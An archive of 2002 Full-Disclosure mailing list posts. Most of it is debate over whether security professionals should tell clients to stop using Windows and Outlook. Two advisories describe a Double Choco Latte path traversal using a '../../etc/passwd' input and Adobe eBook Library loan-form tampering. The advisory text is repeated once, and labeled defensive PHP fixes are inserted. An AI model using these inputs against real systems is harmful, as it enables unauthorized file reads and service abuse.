> bothered to disable all the various active scripting etc.......
>

Patient: Doctor, it hurts when I bang my head into the wall. What can I do?
Doctor: Stop banging your head into the wall!

Chris

From johnc at grok.org.uk Sun Jul 14 19:01:42 2002
From: johnc at grok.org.uk (John Cartwright)
Date: Sun, 14 Jul 2002 19:01:42 +0100
Subject: [Full-Disclosure] List Charter
In-Reply-To: <20020712134833.GA547@www1.grok.org.uk>
References: <20020712134833.GA547@www1.grok.org.uk>
Message-ID: <20020714180142.GA4402@www1.grok.org.uk>

On Fri, Jul 12, 2002 at 02:48:33PM +0100, John Cartwright wrote:
> We're contemplating the creation of a list charter, and welcome
> your ideas. Whether this occurs on- or off-list is entirely up
> to you, the members.

Hi

A draft charter is now available at http://lists.netsys.com/full-disclosure-charter.html

Comments?

- John

From core at bokeoa.com Sun Jul 14 19:25:27 2002
From: core at bokeoa.com (Charles 'core' Stevenson)
Date: Sun, 14 Jul 2002 12:25:27 -0600
Subject: [Full-Disclosure] Anonymous surfing my ass!
References: <006301c22b4c$1e0afa60$6401a8c0@Laptop2>
Message-ID: <3D31C217.5070105@bokeoa.com>

Hasty flames are counterproductive. Let us not be so quick to judge.
Speaking from personal experience, I would imagine that most people's first few advisories are bound to lack clarity/details. Additionally one must remember not to hit that reply button instantly after reading a post that triggers anger/hostility. I myself am guilty of all the aforementioned shortcomings. But hey, we're human, aren't we?

Nor should a man be in a hurry to publish his advisory the instant his proof-of-concept exploit works. Sitting on a bug for a little while will afford the time to polish the advisory and/or exploit. The discloser must determine the fundamental pieces of information every advisory should have and a format which puts the bottom line up front. In this fashion the discloser can take pride in knowing, whether the bug was trivial to exploit or a work of art, that all of those who read it will walk away with a clear understanding of the problem, impact, solution, etc. Take a look at Security Focus's vuln-help advisory template.

peace,
core

Steve wrote:
> You would think that the email sent to the list would have contained
> more information. Based on the email sent, one might not even
> bother clicking on the link. And for those of us who happen to be
> checking email on Windoze boxes, clicking on random Internet links
> probably isn't the brightest thing to do from IE unless you have
> bothered to disable all the various active scripting etc.......
>
> How seriously would you take an email that simply said "click here
> www.clicktobeowned.com"
>
>
>> I think if you at least clicked the advisory link (
> http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Anonymous
> surfing, NOT! ) it would help relieve some of your ignorance. What he's
> referring to is getting script (usually javascript) through the
> filters and executing on the 'anonymous' person's machine. If a site can
> do that they can save cookies to the machine, thereby breaking the
> anonymity.
>
> It's not really cross site scripting, though the techniques used to get
> it through are similar. Right now 'cross site scripting' seems to be the
> buzz word attached to any security breach involving scripts. Something
> we have to live with I guess. Anyway, whatever it's called SkyLined
> seems to be the l33test at it ;)
>
> - Blazde
>

From ulfh at update.uu.se Sun Jul 14 21:48:23 2002
From: ulfh at update.uu.se (Ulf Harnhammar)
Date: Sun, 14 Jul 2002 22:48:23 +0200 (CEST)
Subject: [Full-Disclosure] Double Choco Latte multiple vulnerabilities
Message-ID:

Double Choco Latte multiple vulnerabilities

PROGRAM: Double Choco Latte
VENDOR: Michael Dean GNU Enterprise
HOMEPAGE: http://dcl.sourceforge.net/index.php
VULNERABLE VERSIONS: 20020215, possibly others
NOT VULNERABLE VERSIONS: 20020706
LOGIN REQUIRED: yes
SEVERITY: high

DESCRIPTION:

"Double Choco Latte is a package that provides basic project management capabilities, time tracking on tasks, call tracking, email notifications, online documents, statistical reports, a report engine, and more features are either working or being developed/planned. It is licensed under the GPL (GNU Public License), which means it is free to study, distribute, modify, and use."
(direct quote from the program's homepage)

SECURITY HOLES:

1) Both in Projects: Upload File Attachment and in Work Orders: Import, the program allows file uploads to occur, without checking if the four global variables with information about an upload (foo, foo_name, foo_size and foo_type) really were set by uploading a file or if they were normal POST data.
This means that the upload functions can be fooled into treating any file that the web server can read (like /etc/passwd) as if it is the uploaded file. You fix this by using PHP's is_uploaded_file() function, which checks if a real upload has taken place.

2) When downloading files in Projects: Attachments, Double Choco Latte doesn't check if the path contains any ".." strings. This makes it possible for an attacker to download any file that the web server can read. He or she can download /etc/passwd by asking for "../../../../../../../etc/passwd".

3) Double Choco Latte has got lots of XSS (Cross-Site Scripting) issues, as the program displays user-supplied data without removing HTML tags. This occurs in Ticket# Find, Priorities, Severities, Projects, WO# Find, Departments and Users. You fix this with the htmlspecialchars() function.

COMMUNICATION WITH VENDOR:

The vendor was contacted on the 26th and 30th of May, and on the 26th of June. They released version 20020706, which does not have any of these security holes, on the 5th of July.

RECOMMENDATION:

I recommend that all administrators upgrade to version 20020706.

// Ulf Harnhammar
ulfh at update.uu.se

From nick at virus-l.demon.co.uk Sun Jul 14 22:35:22 2002
From: nick at virus-l.demon.co.uk (Nick FitzGerald)
Date: Mon, 15 Jul 2002 09:35:22 +1200
Subject: [Full-Disclosure] Anonymous surfing my ass!
In-Reply-To: <20020714155647.GA27147@unixzone.com>
References: <006301c22b4c$1e0afa60$6401a8c0@Laptop2>
Message-ID: <0GZ900AHODB1Y7@smtp2.clear.net.nz>

Chris replied to Steve:

> On Sun, Jul 14, 2002 at 09:35:39AM -0600, Steve wrote:
> ...
> > bother clicking on the link. And for those of us who happen to be
> > checking email on Windoze boxes, clicking on random Internet links
> > probably isn't the brightest thing to do from IE unless you have
> > bothered to disable all the various active scripting etc.......
>
> Patient: Doctor, it hurts when I bang my head into the wall. What can I do?
> Doctor: Stop banging your head into the wall!

Yes, yes, but for many -- and for better or worse, though there's no prize for guessing which I think it is -- not using Windows (and even such stupidities as not using Outlook, or worse, not using Notes) is not an option without breaking local "security" policies.

As the people who are likely to directly benefit most (at all?) from lists such as this are the people who have to be seen to be most committed to enforcing security policies (even if they are grievously stupid policies), throwing out a blanket "don't use Windows" or "don't use " is not a constructive response.

Suggesting sidestepping or subverting the local security policy (I'm not saying Chris was -- it could be inferred from his comment, but that would be a stretch) is grossly unprofessional (unless the suggester is not a security professional, in which case it is just common stupidity).

Regards,

Nick FitzGerald

From dfs at roaringpenguin.com Sun Jul 14 22:58:59 2002
From: dfs at roaringpenguin.com (David F. Skoll)
Date: Sun, 14 Jul 2002 17:58:59 -0400 (EDT)
Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass!)
In-Reply-To: <0GZ900AHODB1Y7@smtp2.clear.net.nz>
Message-ID:

On Mon, 15 Jul 2002, Nick FitzGerald wrote:

> throwing out a blanket "don't use Windows" or "don't use
> " is not a constructive response.

I disagree. I consider myself a security professional, and I tell all of my clients not to use Microsoft Outlook. I would consider it a dereliction of duty _not_ to tell them that. I also tell them they should switch away from Windows to Linux or some other free UNIX, and again, I think it's my duty to tell them that.

They are free to take my advice or not, but they understand that if they do not take my advice with regards to Outlook, I am absolved of responsibility for any e-mail borne malware.
I think it's important for security professionals to tell people not to use Windows, if only to open their eyes to the risk they put themselves at, and also to the fact that there are alternatives out there.

Regards,

David.

From nick at virus-l.demon.co.uk Sun Jul 14 23:19:30 2002
From: nick at virus-l.demon.co.uk (Nick FitzGerald)
Date: Mon, 15 Jul 2002 10:19:30 +1200
Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Ano
In-Reply-To:
References: <0GZ900AHODB1Y7@smtp2.clear.net.nz>
Message-ID: <0GZ9002ZKFCKBP@smtp1.clear.net.nz>

"David F. Skoll" wrote:

> > throwing out a blanket "don't use Windows" or "don't use
> > " is not a constructive response.
>
> I disagree. I consider myself a security professional, and I tell all
> of my clients not to use Microsoft Outlook. I would consider it a
> dereliction of duty _not_ to tell them that. I also tell them they
> should switch away from Windows to Linux or some other free UNIX, and
> again, I think it's my duty to tell them that.
>
> They are free to take my advice or not, but they understand that if
> they do not take my advice with regards to Outlook, I am absolved of
> responsibility for any e-mail borne malware.
>
> I think it's important for security professionals to tell people not
> to use Windows, if only to open their eyes to the risk they put
> themselves at, and also to the fact that there are alternatives out
> there.

I agree with all of the above.

My point was, on lists like this, if someone is using Windows or some especially distasteful Windows network client software they are most likely doing so either because, as in my case, they have chosen to after weighing the various pros and cons of that decision, or because "they have to" (being under one of those aforementioned "stupid" policy restrictions that requires all desktops to conform to a limited sense of "corporate normality").
Telling such people to drop their carefully chosen or enforced environment means you are more likely to be ignored as being "out of touch" or some such. That does not mean it is necessarily a waste of breath to advise a paying customer, but doing it among a group of security-aware professional peers is likely to make one look bigoted and thus more likely to get you ignored.

My comment about unprofessionalism was limited to a specific setting. Suggesting a "spot fix" that a nanosecond's consideration shows is likely to be policy-violating in many corporate IT environments will have one branded "unthinking" at best and quite likely "unprofessional". Making the same suggestion when asked for professional advice is not unprofessional (at least, so long as the rest of the "structural changes", such as altering local security policies to accommodate the suggested changes, etc., are also covered in that advice).

Regards,

Nick FitzGerald
(direct quote from the program's homepage) SECURITY HOLES: 1) Both in Projects: Upload File Attachment and in Work Orders: Import, the program allows file uploads to occur, without checking if the four global variables with information about an upload (foo, foo_name, foo_size and foo_type) really were set by uploading a file or if they were normal POST data. This means that the upload functions can be fooled into treating any file that the web server can read (like /etc/passwd) as if it is the uploaded file. You fix this by using PHP's is_uploaded_file() function, which checks if a real upload has taken place. 2) When downloading files in Projects: Attachments, Double Choco Latte doesn't check if the path contains any ".." strings. This makes it possible for an attacker to download any file that the web server can read. He or she can download /etc/passwd by asking for "../../../../../../../etc/passwd". 3) Double Choco Latte has got lots of XSS (Cross-Site Scripting) issues, as the program displays user-supplied data without removing HTML tags. This occurs in Ticket# Find, Priorities, Severities, Projects, WO# Find, Departments and Users. You fix this with the htmlspecialchars() function. COMMUNICATION WITH VENDOR: The vendor was contacted on the 26th and 30th of May, and on the 26th of June. They released version 20020706, which does not have any of these security holes, on the 5th of July. RECOMMENDATION: I recommend that all administrators upgrade to version 20020706. 
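The three fixes the advisory above names, is_uploaded_file() for hole 1, a path check for hole 2 and htmlspecialchars() for hole 3, put together as an added PHP example. This is not Double Choco Latte's code and not part of Ulf Harnhammar's post; the attachment directory, the field names and the function names are assumed for illustration. The first hole stems from PHP 4's register_globals: an upload populated $foo, $foo_name, $foo_size and $foo_type, but an ordinary POST field of the same name populated the same variables, so the code below reads only the $_FILES superglobal and asks PHP whether the temp file really came from this request's upload.

```php
<?php
// Added example, not DCL's code. Assumes PHP >= 7.4, a hypothetical
// ATTACHMENT_DIR, and the standard $_FILES / $_GET superglobals.
declare(strict_types=1);

const ATTACHMENT_DIR = '/var/lib/dcl/attachments'; // hypothetical path

// Hole 1: accept only a file that really arrived via HTTP upload.
// is_uploaded_file() is true only for the temp file PHP created for this
// request, so a POST field that merely names /etc/passwd is rejected.
function storeUpload(string $field): string
{
    if (!isset($_FILES[$field]) || $_FILES[$field]['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('no valid upload in field ' . $field);
    }
    $tmp = $_FILES[$field]['tmp_name'];
    if (!is_uploaded_file($tmp)) {
        throw new RuntimeException('not an uploaded file: ' . $tmp);
    }
    // Ignore the client-supplied name entirely; store under a server-chosen one.
    $dest = ATTACHMENT_DIR . '/' . bin2hex(random_bytes(16));
    if (!move_uploaded_file($tmp, $dest)) {
        throw new RuntimeException('move_uploaded_file failed');
    }
    return $dest;
}

// Hole 2: a requested attachment must resolve to a file inside ATTACHMENT_DIR.
// basename() drops any directory part ("../../../../etc/passwd" -> "passwd"),
// and the realpath() prefix check catches symlinks or anything else that
// would still escape the directory.
function resolveAttachment(string $requested): string
{
    $name = basename($requested);
    if ($name === '' || $name === '.' || $name === '..') {
        throw new RuntimeException('invalid attachment name');
    }
    $base = realpath(ATTACHMENT_DIR);
    $path = realpath(ATTACHMENT_DIR . '/' . $name);
    if ($base === false || $path === false || strpos($path, $base . '/') !== 0) {
        throw new RuntimeException('attachment not found');
    }
    return $path;
}

// Hole 3: HTML-escape every user-supplied string before it reaches the page.
// ENT_QUOTES covers both quote characters, so the value is also safe inside
// an attribute; the charset argument stops multibyte tricks.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hole 3 applied to a "Ticket# Find" style search field (hypothetical field name):
echo '<td>' . h($_GET['ticket'] ?? '') . '</td>';
```

resolveAttachment() only returns a path; the caller still decides what to send and with which Content-Type. The realpath() check rather than a blanket rejection of ".." is deliberate: ".." can be smuggled past a substring test through URL encoding or overlong sequences, while a canonicalised path compared against the directory prefix has nothing to decode.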
// Ulf Harnhammar ulfh at update.uu.se
From dufresne at winternet.com Mon Jul 15 01:11:23 2002 From: dufresne at winternet.com (Ron DuFresne) Date: Sun, 14 Jul 2002 19:11:23 -0500 (CDT) Subject: [Full-Disclosure] Anonymous surfing my ass! In-Reply-To: <0GZ900AHODB1Y7@smtp2.clear.net.nz> Message-ID: On Mon, 15 Jul 2002, Nick FitzGerald wrote: [SNIP] > > Yes, yes but for many -- and for better or worse, though there's no > prize for guessing which I think it is -- not using Windows (and > even such stupidities as not using Outlook, or worse not using Notes) > is not an option without breaking local "security" policies. As the > people who are likely to directly benefit most (at all?) from lists > such as this are the people who have to be seen to be most committed > to enforcing security policies (even if they are grievously stupid > policies), throwing out a blanket "don't use Windows" or "don't use > " is not a constructive response. > > Suggesting sidestepping or subverting the local security policy (I'm > not saying Chris was -- it could be inferred from his comment, but > that would be a stretch) is grossly unprofessional (unless the > suggester is not a security professional, in which case it is just > common stupidity). > And yet, for those on the corp backbone stuck using broken software, and unable to login to a system not-so-broked on the inside, perhaps reading the lists from a hotmail or other account is a better option.
Or perhaps setting up an OpenBSD or Linux system less prone to these exploits circulating at home might be a better way to avoid some of the hassles with borked systems on their desktops. It all depends I guess upon how much effort they wish to invest into their chosen field of employment/enjoyment. Thanks, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From dufresne at winternet.com Mon Jul 15 01:23:02 2002 From: dufresne at winternet.com (Ron DuFresne) Date: Sun, 14 Jul 2002 19:23:02 -0500 (CDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Ano In-Reply-To: <0GZ9002ZKFCKBP@smtp1.clear.net.nz> Message-ID: On Mon, 15 Jul 2002, Nick FitzGerald wrote: [SNIP] > Telling such people to drop > their carefully chosen or enforced environment means you are more > likely to be ignored as being "out of touch" or some such. > > That does not mean it is necessarily a waste of breath to advise a > paying customer, but doing it among a group of security aware > professional peers is likely to make one look bigoted and thus more > likely to get you ignored. > [SNIP] Hmmmm, Does it not make those that do not wish to listen the fewls, being there have been warnings and issues with the tools on their desktops and at their fingertips since some of these lists began and prior. Issues that are "fixed and patched" again and again, and the same warnings have been issued about ActiveX and Java within those tools for how long now? Again, if folks have to play in insecure settings on the corp backbone, then perhaps they need to find alternative ways to play in some of these lists.
I can't count the times that Windows users on the vuln-dev list have been infected with exploit code published there, and then whined about it! Even after warnings by BB that it was what the list was for. People need to take some of the responsibility for their own security upon themselves, IRL and online... Thanks, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From pauls at utdallas.edu Mon Jul 15 04:24:51 2002 From: pauls at utdallas.edu (Paul Schmehl) Date: Sun, 14 Jul 2002 22:24:51 -0500 (CDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) Message-ID: <20020715032451.06AF19B3F@pc11027.utdallas.edu> Do you then wash your hands of that client? Or do you purport to provide them with security expertise without helping them secure their network, simply because you're opposed to the use of MS products? Companies make stupid decisions all the time. It's the job of security professionals to find a way to make that network _as_secure_as_possible_ regardless of the applications they have chosen to use. IOW, after you've gotten off your evangelist's pulpit and come down into the real world, do you simply walk away from clients that refuse to take your advice? Or do you help them secure their network _despite_ their poor choices? Paul Schmehl pauls at utdallas.edu Supervisor, Support Services University of Texas at Dallas AVIEN Founding Member ----- Original Message ----- From: "David F. Skoll" To: Sent: Sunday, July 14, 2002 4:58 PM Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass!)
> > I think it's important for security professionals to tell people not > to use Windows, if only to open their eyes to the risk they put > themselves at, and also to the fact that there are alternatives out > there. From hellnbak at nmrc.org Mon Jul 15 05:44:35 2002 From: hellnbak at nmrc.org (hellNbak) Date: Mon, 15 Jul 2002 00:44:35 -0400 (EDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) In-Reply-To: <20020715032451.06AF19B3F@pc11027.utdallas.edu> Message-ID: I think I just saw a pig fly, hell freeze over etc... I actually agree with Paul Schmehl on something other than Russ Cooper is a sexy beast (not). Mindless "don't use Windows" recommendations are just that, mindless. If you poorly manage the security of Windows networks what makes you think that you will manage the security of *nix networks any better? I do Pen-Tests for a living -- there are just as many ways to own a *nix box as there are a Windows box. Do you expect that the mindless user base is going to be able to figure out Linux (even with X) when they can barely run their MS based machines? So many of my clients would fire you on the spot for recommending that they just stop running MS products. If you truly are a security professional -- you would know better. NOTE: I am not saying that MS products are superior in any way - for those that know what they are doing - yeah run your favourite *nix. On Sun, 14 Jul 2002, Paul Schmehl wrote: > Date: Sun, 14 Jul 2002 22:24:51 -0500 (CDT) > From: Paul Schmehl > Reply-To: full-disclosure at lists.netsys.com > To: full-disclosure at lists.netsys.com > Subject: Re: [Full-Disclosure] Counseling not to use Windows (was Re: > Anonymous surfing my ass\!) > > Do you then wash your hands of that client? Or do you purport to provide them with security expertise without helping them secure their network, simply because you're opposed to the use of MS products? Companies make stupid decisions all the time.
It's the job of security professionals to find a way to make that nework _as_secure_as_possible_ regardless of the applications they have chosen to use. > > IOW, after you've gotten off your evangelist's pulpit and come down into the real world, do you simply walk away from clients that refuse to take your advice? Or do you help them secure their network _despite_ their poor choices? > > Paul Schmehl pauls at utdallas.edu > Supervisor, Support Services > University of Texas at Dallas > AVIEN Founding Member > > ----- Original Message ----- > From: "David F. Skoll" > To: > Sent: Sunday, July 14, 2002 4:58 PM > Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass!) > > > > I think it's important for security professionals to tell people not > > to use Windows, if only to open their eyes to the risk they put > > themselves at, and also to the fact that there are alternatives out > > there. > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- "I don't intend to offend, I offend with my intent" hellNbak at nmrc.org http://www.nmrc.org/~hellnbak -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From vkatalov at elcomsoft.com Mon Jul 15 10:13:31 2002 From: vkatalov at elcomsoft.com (Vladimir Katalov) Date: Mon, 15 Jul 2002 13:13:31 +0400 Subject: [Full-Disclosure] Vulnerability found: The Adobe eBook Library Message-ID: <217445447.20020715131331@elcomsoft.com> Adobe Systems Incorporated (http://www.adobe.com) recently opened a special web site to demonstrate the new library features of Adobe Content Server 3.0 (http://www.adobe.com/products/contentserver). According to Adobe description, "The Adobe eBook Library uses Adobe Content Server as a secure repository for the eBooks". 
The library is located at: http://librarydemo.adobe.com/library/ There are a few books available -- 5 copies of each. The customer can borrow any book for a fixed period of time (one or three days); when one customer gets a book, the counter ("number of books available") is decreased, and when it reaches zero, this book becomes not available until at least one other customer will return it to the library, or loan period will expire. However, there are three bugs/vulnerabilities there: 1. It is possible to get all available copies of any book -- Adobe Acrobat eBook Reader doesn't check if you have borrowed the given book already. 2. The loan period (one or three days) is not verified. It is implemented in the script using the following
Borrow for 1 day
Borrow for 3 days
... The value of loanMin is the loan period in minutes (1440 for one day, and 4320 for three days). It is possible to save the form to the local disk, change one of the values to the one you need (i.e. 525600 for one year), load the updated form into the browser, and by pressing the "Add to bookbag" button borrow this book for the selected ("fake") period. Note: it is also needed to change (in the local copy of the form) "download.asp" to the following: http://librarydemo.adobe.com/library/download.asp Otherwise, the local form will not work. 3. When the book counter reaches zero, the user can see a note near the book description: There are currently none available. Please check back later. However, the "Add to bookbag" button is still available and working just fine, i.e. it is still possible to get another copy (copies) of the book. And the "Number of Books" counter (on the library page) becomes negative. By combining bugs [1] and [2], it is very easy to implement something like a "Denial-of-service" attack for the library: just get all copies of all books from the library (for a very large period of time -- e.g. a few years). So no books will be available to anybody else. Besides, there is the ability to borrow the books for unlimited time. -- Sincerely yours, Vladimir Vladimir Katalov Managing Director ElcomSoft Co.Ltd.
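All three bugs in the post above come from trusting what the client sends (the loanMin field, the "Add to bookbag" button state) instead of checking on the server. The following is an added PHP example, not Adobe's code and not part of Vladimir Katalov's post, of the server-side checks a loan endpoint needs: an allow-list for loanMin rather than the form's value, a per-user check for an existing loan of the same book, and a refusal when the counter is already at zero. The Library class, the user and book identifiers and the timestamp are constructed for illustration.

```php
<?php
// Added example, not Adobe Content Server code. Assumes PHP >= 7.4 and a
// hypothetical in-memory Library; a real deployment keeps this state in a
// database and does the check-and-decrement inside one transaction.
declare(strict_types=1);

// Bug 2: the client may put anything in loanMin; only these values are honoured.
const ALLOWED_LOAN_MINUTES = [1440, 4320]; // 1 day, 3 days

final class Library
{
    /** @var array<string,int> copies still available per book id */
    private array $available;
    /** @var array<string,array<string,int>> user => (book => expiry timestamp) */
    private array $loans = [];

    public function __construct(array $available)
    {
        $this->available = $available;
    }

    /** Returns the loan expiry time, or throws with a reason the caller can log. */
    public function borrow(string $user, string $book, string $loanMinField, int $now): int
    {
        // Bug 2: strict integer parse plus allow-list; "525600" is rejected, so is "1440 ".
        if (!ctype_digit($loanMinField)) {
            throw new InvalidArgumentException('loanMin must be an integer');
        }
        $loanMin = (int) $loanMinField;
        if (!in_array($loanMin, ALLOWED_LOAN_MINUTES, true)) {
            throw new InvalidArgumentException('loanMin not in allowed set');
        }
        // Bug 1: one copy per user at a time, checked on the server, not in the reader.
        if (isset($this->loans[$user][$book]) && $this->loans[$user][$book] > $now) {
            throw new RuntimeException('user already holds this book');
        }
        // Bug 3: refuse when no copies remain, so the counter can never go negative.
        if (($this->available[$book] ?? 0) <= 0) {
            throw new RuntimeException('no copies available');
        }
        $this->available[$book]--;
        $expires = $now + $loanMin * 60;
        $this->loans[$user][$book] = $expires;
        return $expires;
    }

    /** Return a book (or let an expired loan lapse) and restore the copy. */
    public function giveBack(string $user, string $book): void
    {
        if (isset($this->loans[$user][$book])) {
            unset($this->loans[$user][$book]);
            $this->available[$book]++;
        }
    }

    public function availableCopies(string $book): int
    {
        return $this->available[$book] ?? 0;
    }
}

// Usage with constructed data: five copies of one title, two users.
$lib = new Library(['ebook-1' => 5]);
$now = 1026691200; // constructed timestamp, 2002-07-15
$lib->borrow('alice', 'ebook-1', '1440', $now);            // ok, 4 copies left
try {
    $lib->borrow('alice', 'ebook-1', '1440', $now);        // bug 1 blocked
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";
}
try {
    $lib->borrow('bob', 'ebook-1', '525600', $now);        // bug 2 blocked
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
echo $lib->availableCopies('ebook-1'), "\n";                // 4
```

The expiry is computed from the server's own clock and from the allow-listed value, never from anything the form carried, and the availability check and the decrement happen in the same call so that the "none available" message and the button state are derived from the same number the server enforces.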
Member of Association of Shareware Professionals (ASP) Member of Russian Cryptology Association mailto:vkatalov at elcomsoft.com http://www.elcomsoft.com/adc.html (Advanced Disk Catalog) http://www.elcomsoft.com/art.html (Advanced Registry Tracer) http://www.elcomsoft.com/prs.html (Password Recovery Software) From bolo at lupa.de Mon Jul 15 10:18:23 2002 From: bolo at lupa.de (Boris Lorenz) Date: Mon, 15 Jul 2002 11:18:23 +0200 Subject: [Full-Disclosure] List Charter References: <382BC0C28F397F4785E7414B8279F5271B530E@n2-atl-exch.it.n2bb.com> Message-ID: <3D32935F.5BE0E58A@lupa.de> Yup, Alan Rouse wrote: > > My interest is in the earliest possible warning of what the bad guys are > currently trying to do to systems like mine. I don't care who it comes > from, or whether it is presented in a businesslike manner, as long as it > contains useful information. I'm interested in proof of concept code, > actual exploit code, artifacts from actual attacks, theoretical > vulnerabilities discovered by code reviews, defensive tactics, links to > ongoing discussions, educational q & a, or anything else that might make > me aware of potential mayhem and how to prepare for it. > > I'm not interested in flame wars or philosophical arguments. They don't > help me do my job. Spot on, Alan. bugtraq bashing and chit-chat about The Right Thing to do can be refreshing at times, but that's not what my customers want whose networks I have to protect. And that's not what I rate as useful information. I think we will have to wait another week or so till the dust has settled a bit, and the new list shows in which direction it will go; if the current flood of futile discussions keeps its tide, I will prolly sign off. Boris Lorenz * Security Admin *nix - *nux * --- From dfs at roaringpenguin.com Mon Jul 15 12:35:06 2002 From: dfs at roaringpenguin.com (David F. 
Skoll) Date: Mon, 15 Jul 2002 07:35:06 -0400 (EDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) In-Reply-To: <20020715032451.06AF19B3F@pc11027.utdallas.edu> Message-ID: On Sun, 14 Jul 2002, Paul Schmehl wrote: > Do you then wash your hands of that client? It depends. I state up front that I do not support Windows, period. If they want me to install and configure Linux boxes as file servers or mail servers, I work for them. If they want me to do Windows work, I decline. > IOW, after you've gotten off your evangelist's pulpit and come down > into the real world, do you simply walk away from clients that refuse > to take your advice? Again, it depends on the situation. Sometimes, yes. If clients go completely against my advice, they're not worth having. It will blow up in my face later. -- David. From dfs at roaringpenguin.com Mon Jul 15 12:38:30 2002 From: dfs at roaringpenguin.com (David F. Skoll) Date: Mon, 15 Jul 2002 07:38:30 -0400 (EDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) In-Reply-To: Message-ID: On Mon, 15 Jul 2002, hellNbak wrote: > So many of my clients would fire you on the spot for reccomending that > they just stop running MS products. Fine; that's their choice. > If you truly are a security > professional -- you would know better. I think this is a very bad attitude. Trying to secure Windows on the desktop is fundamentally impossible because of design flaws. Sure, UNIX boxes can be owned, no question about it. They can be owned because of bugs such as buffer overflows, tempfile races, etc. which are implementation problems. Windows boxes are fundamentally insecure because of bad design, not only because of programming errors. Encoding metadata such as "executableness" in a filename, for example, is a fundamental design flaw, and one that's impossible to correct without changing Windows' design. 
So no, I don't refuse to deal with clients who use Outlook. But yes, I recommend they switch anyway, because to do less is an abdication of my responsibility. -- David. From cmason at unixzone.com Mon Jul 15 14:32:45 2002 From: cmason at unixzone.com (Chris L. Mason) Date: Mon, 15 Jul 2002 09:32:45 -0400 Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Ano In-Reply-To: <0GZ9002ZKFCKBP@smtp1.clear.net.nz> References: <0GZ900AHODB1Y7@smtp2.clear.net.nz> <0GZ9002ZKFCKBP@smtp1.clear.net.nz> Message-ID: <20020715133245.GA19805@unixzone.com> On Mon, Jul 15, 2002 at 10:19:30AM +1200, Nick FitzGerald wrote: ... > > I agree with all of the above. > > My point was, on lists like this, if someone is using Windows or some > especially distasteful Windows network client software they are most > likely doing so either because, as in my case, they have chosen to > after weighing the various pros and cons of that decision or because > "they have to" (being under one of those aforementioned "stupid" > policy restrictions that requires all desktops to conform to a > limited sense of "corporate normality"). Telling such people to drop > their carefully chosen or enforced environment means you are more > likely to be ignored as being "out of touch" or some such. ... > > My comment about unprofessionalism was limited to a specific setting. > Suggesting a "spot fix" that a nanosecond's consideration shows is > likely to be policy violating in many corporate IT environments will > have one branded "unthinking" at best and quite likely > "unprofessional". Making the same suggestion when asked for > professional advice is not unprofessional (at least, so long as the > rest of the "structural changes" such as altering local security > policies to accommodate the suggested changes, etc are also covered in > that advice). > Well, that's what I get for making such a short comment. :) Anyway, let me try to be more clear.
The many holes in clients such as Internet Explorer and Outlook have been made clear over and over again for many years now. The insecurity of these products is not news. Companies who were dependent on these programs, or who had policies referring to them, have had years now to plan a migration away from them to other tools, and to write new policies. There should never have been any need for a "spot fix." However, there's no point in saying "I told you so" either. So, while it's unfortunate that these products are still so widely used, it's not too late. Companies can still make the necessary decisions and move forward to ensure a more secure and productive environment. My post was intended as a simple reminder that even if you've been banging your head against the wall for years, it's never too late to stop. :) Chris From dfs at roaringpenguin.com Mon Jul 15 15:32:58 2002 From: dfs at roaringpenguin.com (David F. Skoll) Date: Mon, 15 Jul 2002 10:32:58 -0400 (EDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Ano In-Reply-To: <20020715133245.GA19805@unixzone.com> Message-ID: On Mon, 15 Jul 2002, Chris L. Mason wrote: > However, there's no point in saying "I told you so" either. So, while > it's unfortunate that these products are still so widely used, it's not too > late. Companies can still make the necessary decisions and move forward > to ensure a more secure and productive environment. Amen. > My post was intended as a simple reminder that even if you've been banging > your head against the wall for years, it's never too late to stop. :) Right. And that is why I think security professionals *must* advise clients to make long-term plans to wean themselves from proven-insecure products. While security is a process, not a product, the flip side is that insecurity can indeed result from a specific product. The use of insecure products can upset even the most careful security process.
